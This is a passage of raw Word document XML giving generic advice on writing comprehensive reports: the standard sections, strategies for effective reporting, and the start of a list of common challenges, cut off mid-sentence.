          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Comprehensive and detailed reporting is crucial for conveying information effectively and making informed decisions in various fields, from business to research and beyond. To create such reports, it's important to include the following key components:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Title and Cover Page:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Start with a clear and descriptive title that summarizes the content of the report. A cover page with essential details such as the report's title, date, author, and organization adds a professional touch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Table of Contents:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Include a table of contents that outlines the report's structure and page numbers. This allows readers to navigate the report easily.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Executive Summary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Provide a concise summary of the report's key findings, recommendations, and conclusions. The executive summary should be clear and actionable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Begin with an introduction that provides context for the report. Explain its purpose, scope, and objectives. Mention any background information necessary for understanding the content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Methodology:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Describe the methods and processes used to collect data, conduct research, or arrive at findings. This section should detail the research design, data sources, and analytical techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Findings or Results:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Present the main findings, results, or observations. Use clear and organized formats such as tables, charts, and graphs to illustrate key data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Discussion:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Analyze and discuss the findings in detail. Explain their significance, implications, and relevance to the report's objectives. Address any patterns, trends, or anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Offer actionable recommendations based on the findings. Ensure that these recommendations are specific, measurable, and aligned with the report's objectives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Summarize the main points and conclusions of the report. Reinforce the key takeaways and the report's impact or importance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Appendices:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Include any supplementary information, data, or documents in the appendices. This may include raw data, additional charts, detailed methodology, or supporting documents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>References or Citations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Cite all external sources, references, and literature used in the report. Follow a consistent citation style (e.g., APA, MLA, Chicago) and provide a bibliography or reference list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Glossary of Terms:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>If the report uses technical or specialized terminology, include a glossary to define and explain these terms for the reader's understanding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Acknowledgments:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Express gratitude and recognition to individuals or organizations that contributed to the report. This may include collaborators, participants, or funding sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Visual Aids:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Use visual aids, such as images, charts, graphs, and tables, to enhance the presentation of data and make the report more visually appealing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Timelines and Milestones:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>In project or progress reports, outline timelines, milestones, and key events to provide a clear sense of progress and project status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Action Plans:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>In business or project-related reports, outline specific action plans, responsibilities, and timelines for implementing the recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Summaries of Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Consider including a section that highlights the most critical points, allowing readers to quickly grasp the report's essential content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Visual Design and Formatting:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Pay attention to the report's visual design and formatting. Use consistent fonts, styles, headers, and page layouts for a professional and organized appearance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Legal and Ethical Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Include any legal disclaimers, terms of use, or ethical considerations that may apply to the report's content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Contact Information:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Provide contact information for the report's author or the relevant point of contact for further inquiries or discussion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="300"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Creating comprehensive and detailed reports requires attention to detail, clear organization, and effective communication. These key components help ensure that the report is informative, actionable, and well-structured, catering to the needs of its intended audience.</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Effective reporting is essential in various fields, from business to academia, and it plays a critical role in conveying information and influencing decisions. To create impactful reports, consider these strategies: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Know Your Audience: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Understand who will be reading your report. Tailor the content, style, and level of technical detail to match the knowledge and interests of your audience.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Define Clear Objectives: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Determine the purpose and objectives of the report. What do you want to achieve with this report? Clear objectives help guide your content and structure.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Plan and Organize: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Create a detailed outline or structure for your report. This will help you arrange information logically and ensure that you cover all key points.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 Logical Flow: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Present your information in a logical sequence. Start with an introduction, followed by the main body, and conclude with summaries, recommendations, or conclusions.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Clarity and Simplicity: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clear and straightforward language. Avoid jargon or technical terms when they aren't necessary. Make complex ideas accessible to a broader audience.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Visual Aids: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Incorporate charts, graphs, tables, and images to illustrate key points. Visual aids can make complex data more understandable.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Conciseness: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Be concise and avoid unnecessary wordiness. Make every sentence and paragraph count. Shorter sentences are often more impactful.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Evidence-Based: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Support your claims and recommendations with evidence. Use data, statistics, quotes, and citations to add credibility to your report.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Active Voice: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Write in the active voice to make your writing more engaging and direct. Passive voice can make your writing less clear.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Emphasize Key Findings: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Highlight your main findings or recommendations early in the report to grab the reader's attention.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Balance Detail and Brevity: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sufficient detail to support your arguments, but avoid overwhelming the reader with excessive information. Be selective and focus on what's most important.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Proofreading and Editing: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Carefully proofread and edit your report for grammar, spelling, and formatting errors. A well-polished report is more credible and professional.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Consistent Formatting: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 consistent formatting style throughout the report. This includes fonts, headers, and page layouts. Consistency adds professionalism.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White Space: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ample white space to break up text and make the report more visually appealing. Proper spacing and margins help readability.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Cite Sources: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Properly cite all sources, references, and quotations. This adds credibility and integrity to your report.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Appendices for Detail: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you need to include additional information, place it in appendices. This allows you to provide extra detail without cluttering the main report.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Context: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Make sure the reader understands the context of the report. Explain the background, objectives, and why the report is relevant.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Peer Review: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possible, have colleagues or experts in the field review your report before finalizing it. Peer feedback can help identify improvements.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Feedback Mechanism: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Encourage readers to provide feedback or ask questions. This shows that you value their input and helps address any concerns.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Conclusion and Action Items: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Summarize your findings and provide clear action items or recommendations. Make it evident what the reader should do next.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Engage the Reader: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Consider adding a personal touch, anecdotes, or stories to engage the reader emotionally and make your report more memorable.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Stay Updated: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Ensure that the information in your report is up to date. Periodically update your reports to reflect the latest data and developments.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Delivery and Presentation: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Consider the method of delivering your report. Will it be a printed document, a digital file, or a presentation? Tailor the report format to the delivery method.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Follow Up:</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After presenting or distributing your report, follow up with the relevant stakeholders to ensure that recommendations are understood and acted upon.</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Effective reporting is a skill that can be honed with practice and feedback. By employing these strategies, you can create reports that are not only informative but also influential and well-received by your intended audience.</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Implementing comprehensive and detailed reporting can be a challenging task, regardless of the context in which it is used. These challenges often revolve around factors such as time constraints, complexity, audience expectations, and resource limitations. Here are some common challenges in implementing comprehensive and detailed reporting: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Time Constraints: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Reporting often comes with deadlines, and producing a comprehensive report can be time-consuming. Balancing the need for detail with the pressure to meet deadlines is a significant challenge.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Data Collection and Analysis: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Gathering and analyzing the necessary data can be challenging, especially when dealing with large volumes of information or complex datasets.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Scope Management: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Defining the scope of a report and deciding what to include and exclude can be challenging. The risk of including too much information or too many details is common.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Technical Complexity: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 technical fields, such as cybersecurity or scientific research, conveying complex ideas or findings in a clear and understandable manner can be a significant challenge.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Audience Expectations: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Meeting the diverse expectations of different audiences 